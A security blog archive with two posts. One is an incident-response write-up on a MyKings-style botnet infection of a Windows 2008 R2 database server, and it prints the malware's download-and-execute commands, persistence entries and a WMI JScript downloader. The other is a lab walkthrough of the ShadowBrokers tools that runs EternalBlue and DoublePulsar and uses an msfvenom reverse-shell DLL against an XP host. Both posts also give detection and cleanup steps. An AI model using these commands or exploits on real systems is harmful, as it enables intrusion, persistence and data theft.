Tag archive: windows security

[Incident Response] Windows incident response record 20170503

A network-admin colleague reported that some extra exe files had appeared on a Windows 2008 R2 server; we had not paid much attention to monitoring Windows before.
This host is a DB server providing MSSQL and MySQL. Because the switch had run out of ports, it had been given a public IP with no hardware firewall in front; the admin had only enabled the local Windows firewall, filtering 3389 and other sensitive ports, but port 445 was open to the Internet.

Investigation process


Checked MySQL and found two versions installed, 5.1 and 5.7, both running as System. First checked whether the compromise came through a MySQL UDF: nothing unusual in the mysql\lib\plugin directory,
and select * from mysql.func showed nothing abnormal.
Checked MSSQL: it runs with USER privileges; checked xp_cmdshell and the other stored procedures, nothing abnormal.
Checked the system accounts and found an extra one, IUSR_Servs.

The server itself had Norton installed, and the exe files that triggered alerts had all been quarantined.

The quarantined files were as follows

A few sites for checking suspicious files:

https://x.threatbook.cn/
http://www.virscan.org
https://www.virustotal.com/
https://fireeye.ijinshan.com/

Results after uploading them:

http://www.virscan.org

https://x.threatbook.cn/

Found a txt file with the following content:

[down]
http://47.88.216.68:8888/test.dat C:\windows\debug\item.dat 0
http://23.27.127.254:8888/close.bat C:\windows\debug\c.bat 0
[cmd]
Create the user IUSR_Servs and add it to the administrators group
net1 user IUSR_Servs ZxcvBMN,.1987&net1 user IUSR_Servs ZxcvBMN,.1987 /ad&net1 localgroup administrators IUSR_Servs /ad&net1 start schedule

net1 user IISUSER_ACCOUNTXX /del&net1 user IUSR_ADMIN /del&net1 user snt0454 /del&taskkill /f /im Logo1_.exe&del c:\windows\Logo1_.exe&taskkill /f /im Update64.exe&del c:\windows\dell\Update64.exe
taskkill /f /im misiai.exe&del misiai.exe&del c:\windows\RichDllt.dll&net1 user asp.net /del&taskkill /f /im winhost.exe&del c:\windows\winhost.exe&del c:\windows\updat.exe
taskkill /f /im netcore.exe&del c:\windows\netcore.exe&taskkill /f /im ygwmgo.exe&del c:\windows\ygwmgo.exe&net1 user aspnet /del&net1 user LOCAL_USER /del&taskkill /f /im Isass.exe&del c:\windows\debug\Isass.exe
Add a scheduled task
schtasks /create /tn "Mysa" /tr "cmd /c echo open down.mysking.info>s&echo test>>s&echo 1433>>s&echo binary>>s&echo get a.exe>>s&echo bye>>s&ftp -s:s&a.exe" /ru "system" /sc onstart /F

Add startup entries
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "start" /d "regsvr32 /u /s /i:http://js.mykings.top:280/v.sct scrobj.dll" /f
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "start1" /d "msiexec.exe /i http://js.mykings.top:280/helloworld.msi /q" /f
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "rundll32" /d "cmd /c if exist c:\windows\debug\item.dat start rundll32.exe c:\windows\debug\item.dat,ServiceMain aaaa" /f

echo 123>>1.txt&start C:\windows\debug\c.bat&start rundll32.exe c:\windows\debug\item.dat,ServiceMain aaaa
@Wmic Process Where "Name='winlogon.exe' And ExecutablePath='C:\Windows\system\winlogon.exe'" Call Terminate &del C:\Windows\system\winlogon.exe

Then ran taskschd.msc
and deleted the scheduled task Mysa.
Ran regedit.exe
and deleted the abnormal entries from the startup (Run) keys.
Ran services.msc
and checked the registered services; nothing abnormal.
Used Process Explorer to inspect processes, found rundll32.exe c:\windows\debug\item.dat,ServiceMain aaaa and killed it.
Used the Chinese-localized build of procmon to watch the processes' registry reads, file access, network activity and process activity.
The Norton logs showed that every three hours a file was downloaded and saved to C:\windows\debug\item.dat,

but there was nothing in the scheduled tasks. Rebooted the server; the file was still downloaded every three hours.
Checked network connections with netstat -ano | findstr ESTABLIST; no abnormal connections.
Since the download happened every three hours, I looked at which unusual process starts at that time, and found that every three hours C:\Windows\System32\wbem\scrcons.exe starts.
I remembered that this is WMI being used to run a timed task; I had run into it before when a hijacked browser homepage reverted itself half an hour after being fixed, and there too scrcons.exe appeared every half hour.
The method suggested online is to install WMITool, but installing it on this server failed with an error.
Read online that Autoruns can show WMI scripts, and sure enough it turned up the anomaly.

The script content is as follows:

var toff=3000;
var url1 = "http://wmi.mykings.top:8888/kill.html";
http = new ActiveXObject("Msxml2.ServerXMLHTTP");
fso = new ActiveXObject("Scripting.FilesystemObject");
wsh = new ActiveXObject("WScript.Shell");
http.open("GET", url1, false);
http.send();
str = http.responseText;
arr = str.split("\r\n");
for (i = 0; i < arr.length; i++) {
   t = arr[i].split(" ");
   proc = t[0];
   path = t[1];
   dele = t[2];
   wsh.Run("taskkill /f /im " + proc, 0, true);
   if (dele == 0) {
      try { fso.DeleteFile(path, true); }
      catch (e) {}
   }
};
var locator=new ActiveXObject("WbemScripting.SWbemLocator");
var service=locator.ConnectServer(".","root/cimv2");
var colItems=service.ExecQuery("select * from Win32_Process");
var e=new Enumerator(colItems);
var t1=new Date().valueOf();
for(;!e.atEnd();e.moveNext()){
   var p=e.item();
   if(p.Caption=="rundll32.exe")p.Terminate()
};
var t2=0;
while(t2-t1<toff){
var t2=new Date().valueOf()
}
var pp=service.get("Win32_Process");
var url="http://wmi.mykings.top:8888/test.html",
http=new ActiveXObject("Microsoft.XMLHTTP"),
ado=new ActiveXObject("ADODB.Stream"),
wsh=new ActiveXObject("WScript.Shell");
for(http.open("GET",url,!1),
http.send(),
str=http.responseText,
arr=str.split("\r\n"),
i=0;arr.length>i;i++)t=arr[i].split(" ",3),
http.open("GET",t[0],!1),
http.send(),
ado.Type=1,
ado.Open(),
ado.Write(http.responseBody),
ado.SaveToFile(t[1],2),
ado.Close(),
1==t[2]&&wsh.Run(t[1]);
pp.create("regsvr32 /s shell32.dll");
pp.create("regsvr32 /s WSHom.Ocx");
pp.create("regsvr32 /s scrrun.dll");
pp.create("regsvr32 /s c:\\Progra~1\\Common~1\\System\\Ado\\Msado15.dll");
pp.create("regsvr32 /s jscript.dll");
pp.create("regsvr32 /u /s /i:http://js.mykings.top:280/v.sct scrobj.dll");
pp.create("rundll32.exe c:\\windows\\debug\\item.dat,ServiceMain aaaa");

http://wmi.mykings.top:8888/kill.html
Its content is as follows:

ntvdm.exe C:\*.exe 0 mskns.exe c:\windows\mskns.exe 0 ntuhost.exe c:\windows\ntuhost.exe 0 dwnclear.exe c:\windows\dwnclear.exe 0 isass.exe c:\windows\debug\isass.exe 0 l.exe C:\Windows\zecc\lsm.exe 0 lgnzmq.exe c:\windows\lgnzmq.exe 0 asoaui.exe c:\windows\asoaui.exe 0 kxsjitc.exe C:\Windows\WindowsUpdate\kxsjitc.exe.exe 0 lmudoftzo.exe C:\Windows\WindowsUpdate\lmudoftzo.exe 0 nczkow.exe C:\Windows\WindowsUpdate\nczkow.exe 0 smssc.exe C:\Windows\WindowsUpdate\nczkow.exe 0 ShelReaKet.exe C:\Windows\ShelReaKet.exe 0

http://wmi.mykings.top:8888/test.html

Its content is as follows:

http://47.88.216.68:8888/test.dat C:\windows\debug\item.dat 0

Deleted the script.
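As an added example (not code from the original post), the following PowerShell routine does what Autoruns did above in a scriptable way: it lists the WMI permanent event subscriptions on the host, shows the script text each one runs, and removes a named filter/consumer pair. It assumes it runs elevated on the affected host; the namespace and class names are the standard ones under root\subscription, and the function names are my own.

```powershell
# Added example, not from the original post. Enumerates WMI permanent event
# subscriptions: __EventFilter (the WQL trigger), __EventConsumer (the action;
# ActiveScriptEventConsumer is the JScript/VBScript kind hosted by scrcons.exe,
# the process seen every three hours above) and __FilterToConsumerBinding (which
# ties the two together). Run elevated; uses Get-WmiObject so it works on
# Windows 2008 R2 / PowerShell 2.0.

$SubscriptionNamespace = 'root\subscription'

function Get-WmiPersistence {
    $filters   = @(Get-WmiObject -Namespace $SubscriptionNamespace -Class __EventFilter -ErrorAction SilentlyContinue)
    $consumers = @(Get-WmiObject -Namespace $SubscriptionNamespace -Class __EventConsumer -ErrorAction SilentlyContinue)
    $bindings  = @(Get-WmiObject -Namespace $SubscriptionNamespace -Class __FilterToConsumerBinding -ErrorAction SilentlyContinue)

    foreach ($b in $bindings) {
        # Binding.Filter / Binding.Consumer are object paths such as
        # __EventFilter.Name="xyz"; resolve them against the enumerated objects
        $f = $filters   | Where-Object { $b.Filter   -like ('*' + $_.Name + '"') }
        $c = $consumers | Where-Object { $b.Consumer -like ('*' + $_.Name + '"') }

        $payload = ''
        if ($c) {
            switch ($c.__CLASS) {
                'ActiveScriptEventConsumer' { $payload = $c.ScriptText }           # script run by scrcons.exe
                'CommandLineEventConsumer'  { $payload = $c.CommandLineTemplate }  # command line run by WMI
            }
        }
        New-Object PSObject -Property @{
            FilterName   = $(if ($f) { $f.Name }    else { $b.Filter })
            Query        = $(if ($f) { $f.Query }   else { '(filter object missing)' })
            ConsumerName = $(if ($c) { $c.Name }    else { $b.Consumer })
            ConsumerType = $(if ($c) { $c.__CLASS } else { '(consumer object missing)' })
            Payload      = $payload
        }
    }

    # A filter on __TimerEvent only fires because a timer instruction exists;
    # its interval is what produces a fixed period such as the three hours seen above
    foreach ($ns in $SubscriptionNamespace, 'root\cimv2') {
        Get-WmiObject -Namespace $ns -Class __IntervalTimerInstruction -ErrorAction SilentlyContinue |
            ForEach-Object {
                New-Object PSObject -Property @{
                    FilterName   = '(timer in ' + $ns + ')'
                    Query        = 'TimerId=' + $_.TimerId + ' every ' + $_.IntervalBetweenEvents + ' ms'
                    ConsumerName = ''; ConsumerType = '__IntervalTimerInstruction'; Payload = ''
                }
            }
    }
}

function Remove-WmiPersistence {
    # Removes one filter/consumer pair and its binding. The binding goes first so
    # nothing fires while the other two objects are being torn down.
    param([Parameter(Mandatory=$true)][string]$FilterName,
          [Parameter(Mandatory=$true)][string]$ConsumerName)
    Get-WmiObject -Namespace $SubscriptionNamespace -Class __FilterToConsumerBinding |
        Where-Object { $_.Filter -like ('*' + $FilterName + '"') -and $_.Consumer -like ('*' + $ConsumerName + '"') } |
        Remove-WmiObject
    Get-WmiObject -Namespace $SubscriptionNamespace -Class __EventConsumer |
        Where-Object { $_.Name -eq $ConsumerName } | Remove-WmiObject
    Get-WmiObject -Namespace $SubscriptionNamespace -Class __EventFilter |
        Where-Object { $_.Name -eq $FilterName } | Remove-WmiObject
}

# Triage: list everything first, then remove the pair whose Payload is the
# downloader script shown above. The names below are placeholders; use the ones
# Autoruns (or this listing) reports.
Get-WmiPersistence | Format-List FilterName, Query, ConsumerType, Payload
# Remove-WmiPersistence -FilterName '<filter name from listing>' -ConsumerName '<consumer name from listing>'
```

On a clean 2008 R2 host the listing is usually empty or contains only Microsoft's own BVTFilter/BVTConsumer pair; any ActiveScriptEventConsumer whose Payload downloads and runs code is an implant. Because the subscription lives in the WMI repository rather than in the task scheduler or the Run keys, it survives the cleanup steps performed earlier and a reboot, which is exactly why item.dat kept coming back every three hours.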

Recommended auxiliary tools for hunting on Windows:

Process Monitor
Process Explorer
Wsyscheck
PC Hunter
autoruns

Improvements


1) Hunting on Windows is more involved than on Linux; antivirus software really has to be installed on Windows.
2) Make the DB reachable only from the internal network, remove the public IP, migrate MySQL to Linux and run it with reduced privileges.

References


http://www.jb51.net/hack/82851.html
http://jingyan.baidu.com/article/0964eca26f47b38285f536c6.html
http://bbs.kafan.cn/thread-2047183-1-1.html
http://bbs.kafan.cn/thread-2064286-1-1.html

Testing the ShadowBrokers tools

Timeline


1. In August 2016 a hacker group calling itself "Shadow Brokers" claimed to have broken into the Equation Group and stolen a large number of secret files, some of which it published on the Internet. The Equation Group is said to be a hacking group under the NSA (US National Security Agency) with extremely advanced capabilities. The published files included quite a few covert underground hacking tools. "Shadow Brokers" also kept some files back, intending to sell them by public auction to the highest bidder, asking 1 million bitcoin (worth close to 500 million USD); those tools never sold.
2. On April 8, 2017 (Beijing time), "Shadow Brokers" published the decompression password for the retained portion; someone decompressed it and uploaded it to GitHub for download.
3. On the evening of April 14, 2017 (Beijing time), following the earlier release of the password, "Shadow Brokers" released a second batch of retained files on Twitter, this time found to contain 23 new hacking tools.
These tools are named OddJob, EasyBee, EternalRomance, FuzzBunch, EducatedScholar, EskimoRoll, EclipsedWing, EsteemAudit, EnglishMansDentist, MofConfig, ErraticGopher, EmphasisMine, EmeraldThread, EternalSynergy, EwokFrenzy, ZippyBeer, ExplodingCan, DoublePulsar and so on.

Affected Windows versions


Windows NT, Windows 2000, Windows XP, Windows 2003, Windows Vista, Windows 7, Windows 8, Windows 2008, Windows 2008 R2, Windows Server 2012 SP0

Tool download


1) Python 2.6 and pywin32 installers (note that both must be 32-bit, otherwise loading the dll payload files fails)
http://pan.baidu.com/s/1jHKw0AU password: kuij
2) The NSA attack tools released by Shadowbrokers
https://github.com/misterch0c/shadowbroker
windows: includes the Windows exploitation tools, implants and some attack code
swift: includes material on bank attacks
oddjob: includes docs related to the ODDJOB backdoor
3) Compromise-check tool
https://github.com/countercept/doublepulsar-detection-script

Test environment


172.16.100.128 Kali
172.16.100.174 Windows 2003 SP2  attacker machine
172.16.100.176 Windows XP SP3  target (the firewall must be turned off; with it on, port 445 is blocked)

FUZZBUNCH framework test


FuzzBunch is somewhat like metasploit, is cross-platform, and is driven through fb.py.
First create the directories listeningposts and log_dirs under C:\shadowbroker\windows,
then change to C:\shadowbroker\windows and run fb.py

C:\shadowbroker\windows>python fb.py

--[ Version 3.5.1

[*] Loading Plugins
[*] Initializing Fuzzbunch v3.5.1
[*] Adding Global Variables
[+] Set ResourcesDir => D:\DSZOPSDISK\Resources
[+] Set Color => True
[+] Set ShowHiddenParameters => False
[+] Set NetworkTimeout => 60
[+] Set LogDir => D:\logs
[*] Autorun ON

ImplantConfig Autorun List
==========================

  0) prompt confirm
  1) execute


Exploit Autorun List
====================

  0) apply
  1) touch all
  2) prompt confirm
  3) execute


Special Autorun List
====================

  0) apply
  1) touch all
  2) prompt confirm
  3) execute


Payload Autorun List
====================

  0) apply
  1) prompt confirm
  2) execute


[+] Set FbStorage => C:\shadowbroker\windows\storage

[*] Retargetting Session

[?] Default Target IP Address [] : 172.16.100.176
[?] Default Callback IP Address [] : 172.16.100.174
[?] Use Redirection [yes] : no

[?] Base Log directory [D:\logs] : log_dirs
[*] Checking C:\shadowbroker\windows\log_dirs for projects
Index     Project
-----     -------
0         smb_log_dirs
1         Create a New Project

[?] Project [0] : 1
[?] New Project Name :
[?] Set target log directory to 'C:\shadowbroker\windows\log_dirs\z172.16.100.17
6'? [Yes] :

[*] Initializing Global State
[+] Set TargetIp => 172.16.100.176
[+] Set CallbackIp => 172.16.100.174

[!] Redirection OFF
[+] Set LogDir => C:\shadowbroker\windows\log_dirs\z172.16.100.176

Module: Global Variables
========================

Name                    Value
----                    -----
ResourcesDir            D:\DSZOPSDISK\Resources
Color                   True
ShowHiddenParameters    False
FbStorage               C:\shadowbroker\windows\storage
LogDir                  C:\shadowbroker\windows\log_dirs\z172.16.100.176
TargetIp                172.16.100.176
CallbackIp              172.16.100.174
TmpDir                  C:\shadowbroker\windows\log_dirs\z172.16.100.176
NetworkTimeout          60

Here Target IP is the target machine's IP and Callback IP is the IP of the attacking machine running fb.py.
The use command selects a plugin, as listed below:

fb > use
Architouch           Esteemaudit          Printjoblist
Darkpulsar           Esteemaudittouch     Processlist
Domaintouch          Eternalblue          Regdelete
Doublepulsar         Eternalchampion      Regenum
Easybee              Eternalromance       Regread
Easypi               Eternalsynergy       Regwrite
Eclipsedwing         Ewokfrenzy           Rpcproxy
Eclipsedwingtouch    Explodingcan         Rpctouch
Educatedscholar      Explodingcantouch    Smbdelete
Educatedscholartouch Iistouch             Smblist
Emeraldthread        Jobadd               Smbread
Emeraldthreadtouch   Jobdelete            Smbtouch
Emphasismine         Joblist              Smbwrite
Englishmansdentist   Mofconfig            Webadmintouch
Erraticgopher        Namedpipetouch       Worldclienttouch
Erraticgophertouch   Pcdlllauncher        Zippybeer
Eskimoroll           Printjobdelete

The plugins fall into several categories:
target identification and vulnerability discovery: Architouch, Rpctouch, Domaintouch, Smbtouch, etc.;
exploitation: EternalBlue, Emeraldthread, Eclipsedwing, EternalRomance, etc.;
post-exploitation: Doublepulsar, Regread, Regwrite, etc.
Next we use Smbtouch, which uses the SMB protocol to detect the target's OS version, architecture and exploitable vulnerabilities.

fb > use Smbtouch

[!] Entering Plugin Context :: Smbtouch
[*] Applying Global Variables
[+] Set NetworkTimeout => 60
[+] Set TargetIp => 172.16.100.176
fb Touch (Smbtouch) > execute

[!] Preparing to Execute Smbtouch
[*] Redirection OFF

[+] Configure Plugin Local Tunnels

[+] Configure Plugin Remote Tunnels


Module: Smbtouch
================

Name                    Value
----                    -----
NetworkTimeout          60
TargetIp                172.16.100.176
TargetPort              445
RedirectedTargetIp
RedirectedTargetPort
UsingNbt                False
Pipe
Share
Protocol                SMB
Credentials             Anonymous

[?] Execute Plugin? [Yes] :
[*] Executing Plugin
[+] SMB Touch started

[*] TargetIp              172.16.100.176
[*] TargetPort            445
[*] RedirectedTargetIp    (null)
[*] RedirectedTargetPort  0
[*] NetworkTimeout        60
[*] Protocol              SMB
[*] Credentials           Anonymous

[*] Connecting to target...
        [+] Initiated SMB connection

[+] Target OS Version 5.1 build 2600
    Windows 5.1

[!] Target could be either SP2 or SP3,
[!] for these SMB exploits they are equivalent

[*] Trying pipes...
        [+] spoolss    - Success!

[+] Target is 32-bit

[Not Supported]
        ETERNALSYNERGY  - Target OS version not supported

[Vulnerable]
        ETERNALBLUE     - DANE
        ETERNALROMANCE  - FB
        ETERNALCHAMPION - DANE/FB

[*] Writing output parameters

[+] Target is vulnerable to 3 exploits
[+] Touch completed successfully

[+] Smbtouch Succeeded

The target appears to have three exploitable vulnerabilities (EternalBlue, EternalRomance and EternalChampion); the tests posted online all use EternalBlue, so let's try it

fb Touch (Smbtouch) > use eternalblue

[!] Entering Plugin Context :: Eternalblue
[*] Applying Global Variables
[+] Set NetworkTimeout => 60
[+] Set TargetIp => 172.16.100.176

[*] Applying Session Parameters
[-] Error: Invalid value for Target (XP_SP2SP3_X86)
[-] Skipping 'Target'
[*] Running Exploit Touches


[!] Enter Prompt Mode :: Eternalblue

Module: Eternalblue
===================

Name                  Value
----                  -----
NetworkTimeout        60
TargetIp              172.16.100.176
TargetPort            445
VerifyTarget          True
VerifyBackdoor        True
MaxExploitAttempts    3
GroomAllocations      12
Target                WIN72K8R2

[!] plugin variables are valid
[?] Prompt For Variable Settings? [Yes] :

[*]  NetworkTimeout :: Timeout for blocking network calls (in seconds). Use -1 f
or no timeout.

[?] NetworkTimeout [60] :

[*]  TargetIp :: Target IP Address

[?] TargetIp [172.16.100.176] :

[*]  TargetPort :: Port used by the SMB service for exploit connection

[?] TargetPort [445] :

[*]  VerifyTarget :: Validate the SMB string from target against the target sele
cted before exploitation.

[?] VerifyTarget [True] :

[*]  VerifyBackdoor :: Validate the presence of the DOUBLE PULSAR backdoor befor
e throwing. This option must be enabled for multiple exploit attempts.

[?] VerifyBackdoor [True] :

[*]  MaxExploitAttempts :: Number of times to attempt the exploit and groom. Dis
abled for XP/2K3.

[?] MaxExploitAttempts [3] :

[*]  GroomAllocations :: Number of large SMBv2 buffers (Vista+) or SessionSetup
allocations (XK/2K3) to do.

[?] GroomAllocations [12] :

[*]  Target :: Operating System, Service Pack, and Architecture of target OS

    0) XP            Windows XP 32-Bit All Service Packs
   *1) WIN72K8R2     Windows 7 and 2008 R2 32-Bit and 64-Bit All Service Packs

[?] Target [1] : 0
[+] Set Target => XP


[!] Preparing to Execute Eternalblue

[*]  Mode :: Delivery mechanism

   *0) DANE     Forward deployment via DARINGNEOPHYTE
    1) FB       Traditional deployment from within FUZZBUNCH

[?] Mode [0] : 1
[+] Run Mode: FB

[?] This will execute locally like traditional Fuzzbunch plugins. Are you sure?
(y/n) [Yes] :
[*] Redirection OFF

[+] Configure Plugin Local Tunnels
[+] Local Tunnel - local-tunnel-1
[?] Destination IP [172.16.100.176] :
[?] Destination Port [445] :
[+] (TCP) Local 172.16.100.176:445

[+] Configure Plugin Remote Tunnels


Module: Eternalblue
===================

Name                  Value
----                  -----
DaveProxyPort         0
NetworkTimeout        60
TargetIp              172.16.100.176
TargetPort            445
VerifyTarget          True
VerifyBackdoor        True
MaxExploitAttempts    3
GroomAllocations      12
ShellcodeBuffer
Target                XP

[?] Execute Plugin? [Yes] :
[*] Executing Plugin
[*] Connecting to target for exploitation.
    [+] Connection established for exploitation.
[*] Pinging backdoor...
    [+] Backdoor not installed, game on.
[*] Forcing MaxExploitAttempts to 1.
[*] Target OS selected valid for OS indicated by SMB reply
[*] CORE raw buffer dump (12 bytes):
0x00000000  57 69 6e 64 6f 77 73 20 35 2e 31 00              Windows 5.1.
[*] Fingerprinting SMB non-paged pool quota
    [+] Allocation total: 0xfff4
    [+] Spray size: 0
    [+] Allocation total: 0x1ffe8
    [+] Spray size: 1
    [+] Allocation total: 0x2ffdc
    [+] Spray size: 2
    [+] Allocation total: 0x3ffd0
    [+] Spray size: 3
    [+] Allocation total: 0x4ffc4
    [+] Spray size: 4
    [+] Allocation total: 0x5ffb8
    [+] Spray size: 5
    [+] Allocation total: 0x6ffac
    [+] Spray size: 6
    [+] Allocation total: 0x7ffa0
    [+] Spray size: 7
    [+] Allocation total: 0x8ff94
    [+] Spray size: 8
    [+] Allocation total: 0x9ff88
    [+] Spray size: 9
    [+] Allocation total: 0xaff7c
    [+] Spray size: 10
    [+] Allocation total: 0xbff70
    [+] Spray size: 11
    [+] Quota NOT exceeded after 12 packets
    [+] Allocation total: 0xbff70
[*] Building exploit buffer
[*] Sending all but last fragment of exploit packet
    ................DONE.
[*] Sending SMB Echo request
[*] Good reply from SMB Echo request
[*] Starting non-paged pool grooming
    [+] Sending 2 non-paged pool fragment packets
        ....DONE.
    [+] Sent 2 non-paged pool fragment packets ofsize 0x00006FF9
    [+] Sending 10 non-paged pool grooming packets
        ..........DONE.
    [+] Sent 10 non-paged pool grooming packets - groom complete
[*] Sending SMB Echo request
[*] Good reply from SMB Echo request
[*] Sending last fragment of exploit packet!
    DONE.
[*] Receiving response from exploit packet
    [+] ETERNALBLUE overwrite completed successfully (0xC000000D)!
[*] Triggering free of corrupted buffer.
[*] Pinging backdoor...
    [+] Backdoor returned code: 10 - Success!
    [+] Ping returned Target architecture: x86 (32-bit)
    [+] Backdoor installed
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-WIN-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[*] CORE sent serialized output blob (2 bytes):
0x00000000  08 00                                            ..
[*] Received output parameters from CORE
[+] CORE terminated with status code 0x00000000
[+] Eternalblue Succeeded

After the exploit succeeds you cannot run commands directly; other plugins in the framework have to be used with it. The DoublePulsar plugin serves this purpose; DoublePulsar works like an injector and has the following functions.
Ping: check whether the backdoor was deployed successfully
RunDLL: inject a DLL
RunShellcode: inject shellcode
Uninstall: remove the backdoor from the system
The test uses RunDLL to inject a DLL generated earlier with msf into the target system.
Generate the DLL with msf

root@kali-vincent:/tmp# msfvenom -p windows/meterpreter/reverse_tcp LHOST=172.16.100.128 LPORT=2345 -f dll > s.dll
No platform was selected, choosing Msf::Module::Platform::Windows from the payload
No Arch selected, selecting Arch: x86 from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 299 bytes

Then start a listener in msf

 # msfconsole
msf > use exploit/multi/handler
msf > set LHOST 172.16.100.128
msf > set LPORT 2345
msf > set PAYLOAD windows/meterpreter/reverse_tcp
msf > exploit

fb Payload (Doublepulsar) > use DoublePulsar

[!] Entering Plugin Context :: Doublepulsar
[*] Applying Global Variables
[+] Set NetworkTimeout => 60
[+] Set TargetIp => 172.16.100.176

[*] Applying Session Parameters
[-] Error: Invalid value for Function ()
[-] Skipping 'Function'

[!] Enter Prompt Mode :: Doublepulsar

Module: Doublepulsar
====================

Name                  Value
----                  -----
NetworkTimeout        60
TargetIp              172.16.100.176
TargetPort            445
DllPayload            C:\s.dll
DllOrdinal            1
ProcessName           lsass.exe
ProcessCommandLine
Protocol              SMB
Architecture          x86
Function              RunDLL

[!] plugin variables are valid
[?] Prompt For Variable Settings? [Yes] :

[*]  NetworkTimeout :: Timeout for blocking network calls (in seconds).  Use -1
for no timeout.

[?] NetworkTimeout [60] :

[*]  TargetIp :: Target IP Address

[?] TargetIp [172.16.100.176] :

[*]  TargetPort :: Port used by the Double Pulsar back door

[?] TargetPort [445] :

[*]  Protocol :: Protocol for the backdoor to speak

   *0) SMB     Ring 0 SMB (TCP 445) backdoor
    1) RDP     Ring 0 RDP (TCP 3389) backdoor

[?] Protocol [0] :

[*]  Architecture :: Architecture of the target OS

   *0) x86     x86 32-bits
    1) x64     x64 64-bits

[?] Architecture [0] :

[*]  Function :: Operation for backdoor to perform

    0) OutputInstall     Only output the install shellcode to a binary file on d
isk.
    1) Ping              Test for presence of backdoor
   *2) RunDLL            Use an APC to inject a DLL into a user mode process.
    3) RunShellcode      Run raw shellcode
    4) Uninstall         Remove's backdoor from system

[?] Function [2] : 2

[*]  DllPayload :: DLL to inject into user mode

[?] DllPayload [C:\s.dll] : C:\s.dll

[*]  DllOrdinal :: The exported ordinal number of the DLL being injected to call


[?] DllOrdinal [1] :

[*]  ProcessName :: Name of process to inject into

[?] ProcessName [lsass.exe] :

[*]  ProcessCommandLine :: Command line of process to inject into

[?] ProcessCommandLine [] :


[!] Preparing to Execute Doublepulsar
[*] Redirection OFF

[+] Configure Plugin Local Tunnels
[+] Local Tunnel - local-tunnel-1
[?] Destination IP [172.16.100.176] :
[?] Destination Port [445] :
[+] (TCP) Local 172.16.100.176:445

[+] Configure Plugin Remote Tunnels


Module: Doublepulsar
====================

Name                  Value
----                  -----
NetworkTimeout        60
TargetIp              172.16.100.176
TargetPort            445
DllPayload            C:\s.dll
DllOrdinal            1
ProcessName           lsass.exe
ProcessCommandLine
Protocol              SMB
Architecture          x86
Function              RunDLL

[?] Execute Plugin? [Yes] :
[*] Executing Plugin
[+] Selected Protocol SMB
[.] Connecting to target...
[+] Connected to target, pinging backdoor...
        [+] Backdoor returned code: 10 - Success!
        [+] Ping returned Target architecture: x86 (32-bit) - XOR Key: 0x0372FB2
5
    SMB Connection string is: Windows 5.1
    Target OS is: XP x86
        [+] Backdoor installed
        [+] DLL built
        [.] Sending shellcode to inject DLL
        [+] Backdoor returned code: 10 - Success!
        [+] Backdoor returned code: 10 - Success!
        [+] Backdoor returned code: 10 - Success!
        [+] Command completed successfully
[+] Doublepulsar Succeeded

Got the meterpreter callback

meterpreter > sysinfo
Computer        : VINCENT-3B49409
OS              : Windows XP (Build 2600, Service Pack 3).
Architecture    : x86
System Language : zh_CN
Domain          : WORKGROUP
Logged On Users : 2
Meterpreter     : x86/win32
meterpreter > shell
Process 344 created.
Channel 1 created.
Microsoft Windows XP [版本 5.1.2600]
(C) 版权所有 1985-2001 Microsoft Corp.

MSF


https://github.com/rapid7/metasploit-framework/blob/master/modules/auxiliary/scanner/smb/smb_ms17_010.rb
Copy it to /usr/share/metasploit-framework/modules/auxiliary/scanner/smb

msf > use auxiliary/scanner/smb/smb_ms17_010
msf auxiliary(smb_ms17_010) > set rhosts 172.16.100.176
rhosts => 172.16.100.176
msf auxiliary(smb_ms17_010) > exploit 
[*] 172.16.100.176:445 - Connected to \\172.16.100.176\IPC$ with TID = 2048
[*] 172.16.100.176:445 - Received STATUS_INSUFF_SERVER_RESOURCES with FID = 0
[!] 172.16.100.176:445 - Host is likely VULNERABLE to MS17-010!
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

Nmap


smb-vuln-ms17-010 detection script:
https://github.com/cldrn/nmap-nse-scripts/blob/master/scripts/smb-vuln-ms17-010.nse

root@kali:/usr/share/nmap/scripts# nmap -p 445 --script=smb-vuln-ms17-010 192.168.190.46

Starting Nmap 7.40 ( https://nmap.org ) at 2017-05-27 11:41 CST
Nmap scan report for 192.168.190.46
Host is up (0.00054s latency).
PORT STATE SERVICE
445/tcp open microsoft-ds

Host script results:
| smb-vuln-ms17-010: 
| VULNERABLE:
| Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)
| State: VULNERABLE
| IDs: CVE:CVE-2017-0143
| Risk factor: HIGH
| A critical remote code execution vulnerability exists in Microsoft SMBv1
| servers (ms17-010).
| 
| Disclosure date: 2017-03-14
| References:
| https://technet.microsoft.com/en-us/library/security/ms17-010.aspx
| https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks/
|_ https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143

Nmap done: 1 IP address (1 host up) scanned in 0.27 seconds

Compromise detection


Requires a Python environment with the argparse package installed

C:\doublepulsar-detection-script-master>python detect_doublepulsar.py --ip 172.16.100.176
[+] [172.16.100.176] DOUBLEPULSAR DETECTED!!!

Remediation


1) Upgrade to a Windows version that Microsoft still supports, install the latest patches, and configure automatic updates.
2) On versions with no patch, such as Windows 2003 and Windows XP, close ports 135, 137, 139 and 445; for 3389 remote login, if you do not want to close it, at least disable smart card logon.
3) Install antivirus software
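As an added example (not code from the original post), the PowerShell below turns items 1 and 2 of the list into checks and changes that can be run on each Windows host: it reports whether an MS17-010 fix is installed and whether SMBv1 is still enabled, disables SMBv1, and blocks the listed ports inbound at the host firewall. It assumes it runs elevated on Windows 2008 R2 or later; the KB numbers are my assumption from the MS17-010 bulletin (later cumulative rollups supersede them, so a "missing" result means verify, not vulnerable), the registry switch is the one Microsoft documents for SMBv1 on 2008 R2, and the rule and function names are my own.

```powershell
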